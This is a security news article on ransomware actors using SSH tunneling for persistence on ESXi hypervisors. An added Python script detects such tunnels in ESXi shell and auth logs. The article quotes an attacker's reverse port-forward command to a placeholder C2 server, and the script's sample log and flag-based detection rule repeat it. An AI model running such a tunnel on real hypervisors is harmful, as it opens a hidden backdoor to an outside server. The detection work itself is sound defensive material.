Ransomware actors targeting ESXi hypervisors with SSH Tunneling for persistence

Ransomware actors are increasingly targeting VMware ESXi bare-metal hypervisors, exploiting SSH tunneling to maintain persistent, undetected access to compromised systems.

According to cybersecurity firm Sygnia, threat actors are leveraging known vulnerabilities in ESXi appliances or exploiting compromised administrator credentials to gain initial access. Once inside, they exploit the hypervisor’s built-in SSH service, designed to allow system administrators to remotely manage the device. This service, however, is rarely monitored by many organizations, making it an attractive vector for attackers.

Ransomware actors are abusing the feature to establish persistence, move laterally within the network, and deploy ransomware payloads.

By using SSH tunneling, attackers can securely route traffic between the compromised hypervisor and external command-and-control (C2) servers.

For example, attackers can set up a remote port-forwarding configuration via SSH to establish a connection back to the C2 server, using a command such as ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>. This allows attackers to tunnel through the hypervisor and remain undetected for prolonged periods.

“Since ESXi appliances are resilient and rarely shut down unexpectedly, this tunneling serves as a semi-persistent backdoor within the network,” the researchers noted.

ESXi appliances use a distributed logging mechanism that separates log entries into multiple dedicated files, rather than consolidating them into one, as seen with traditional syslog formats. This approach, while organized, can complicate forensic investigations since logs are spread across various files.

To address this, configuring log forwarding from ESXi to an external syslog server is recommended for centralized monitoring and log retention. This setup ensures all relevant events are captured in one location. Key log files for investigating potential attacks, such as SSH tunneling, include /var/log/shell.log, /var/log/hostd.log, /var/log/auth.log, and /var/log/vobd.log.
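The following is an added example, not part of the article or of Sygnia's report, showing how a defender can scan the two log files most relevant to the tunneling technique described above: /var/log/shell.log (every command typed in the ESXi shell) and /var/log/auth.log (sshd login records). The log lines embedded in the script are constructed to mimic those formats, the detection rule (flag any ssh invocation that uses a forwarding option such as -R, -L, -D or -w, or the background/no-command pair -fN) is an assumption drawn from the command shown in the article, and the function names are the author's own.

```python
"""Scan ESXi shell.log / auth.log lines for SSH tunnel set-up (defender tooling).

Added example, not from the article or Sygnia. The log samples below are
constructed to look like ESXi's shell.log and auth.log; the detection rule is
an assumption: an ssh command with a forwarding flag, or with -fN, is treated
as a tunnel.
"""
import re
import shlex
from datetime import datetime, timezone

# Constructed sample of /var/log/shell.log (ESXi logs every shell command).
SHELL_LOG = """\
2025-01-20T08:12:03Z shell[2101442]: [root]: esxcli network ip interface list
2025-01-20T08:14:51Z shell[2101442]: [root]: ssh -fN -R 127.0.0.1:1080 svc@203.0.113.10
2025-01-20T08:15:20Z shell[2101442]: [root]: vim-cmd vmsvc/getallvms
2025-01-20T09:02:44Z shell[2103377]: [admin]: ssh backup@192.0.2.7 'df -h'
"""

# Constructed sample of /var/log/auth.log (sshd login records on the host).
AUTH_LOG = """\
2025-01-20T08:11:40Z sshd[2101430]: Accepted keyboard-interactive/pam for root from 198.51.100.23 port 52110 ssh2
2025-01-20T09:01:58Z sshd[2103360]: Accepted keyboard-interactive/pam for admin from 10.10.5.5 port 41022 ssh2
"""

SHELL_RE = re.compile(
    r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")
AUTH_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port")

# ssh options that open a forwarding channel (remote, local, dynamic, tun).
TUNNEL_FLAGS = {"R", "L", "D", "w"}


def parse_ts(ts):
    """Parse the ISO-8601 UTC timestamp ESXi writes at the start of each line."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def ssh_tunnel_flags(cmd):
    """Return the tunnel-related ssh flags used by a shell command.

    Bundled short options such as -fN or -fNR are unpacked letter by letter.
    An empty set means the command is not an ssh invocation that sets up a
    tunnel; -fN on its own (background, no remote command) is also reported,
    since it only makes sense together with forwarding.
    """
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return set()
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return set()
    found = set()
    for arg in argv[1:]:
        if arg.startswith("-") and not arg.startswith("--"):
            found |= set(arg[1:]) & (TUNNEL_FLAGS | {"f", "N"})
    if found & TUNNEL_FLAGS or {"f", "N"} <= found:
        return found
    return set()


def find_tunnel_events(shell_log):
    """Return one finding per shell.log line that starts an SSH tunnel."""
    findings = []
    for line in shell_log.splitlines():
        m = SHELL_RE.match(line)
        if not m:
            continue
        flags = ssh_tunnel_flags(m["cmd"])
        if flags:
            findings.append({"ts": parse_ts(m["ts"]), "user": m["user"],
                             "pid": int(m["pid"]), "cmd": m["cmd"],
                             "flags": "".join(sorted(flags))})
    return findings


def accepted_logins(auth_log):
    """Extract successful sshd logins (user, source address, time) from auth.log."""
    logins = []
    for line in auth_log.splitlines():
        m = AUTH_RE.match(line)
        if m:
            logins.append({"ts": parse_ts(m["ts"]), "user": m["user"], "src": m["src"]})
    return logins


def attribute(findings, logins):
    """Attach the most recent earlier sshd login of the same user to each finding."""
    for f in findings:
        prior = [l for l in logins if l["user"] == f["user"] and l["ts"] <= f["ts"]]
        f["login_src"] = max(prior, key=lambda l: l["ts"])["src"] if prior else None
    return findings


def scan(shell_log=SHELL_LOG, auth_log=AUTH_LOG):
    """Run detection over both logs and return the attributed findings."""
    return attribute(find_tunnel_events(shell_log), accepted_logins(auth_log))


if __name__ == "__main__":
    for f in scan():
        print(f"{f['ts'].isoformat()} user={f['user']} flags=-{f['flags']} "
              f"login_from={f['login_src']} cmd={f['cmd']!r}")
```

Run against real files by passing their contents to scan(); on the constructed sample it reports the single root command that sets up a reverse forward and ties it to the preceding root login from 198.51.100.23, while the ordinary ssh command run by admin is ignored. Correlating shell.log with auth.log matters because the shell entry alone shows who ran the command but not where that session came from, which is the first question in an incident involving compromised administrator credentials.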
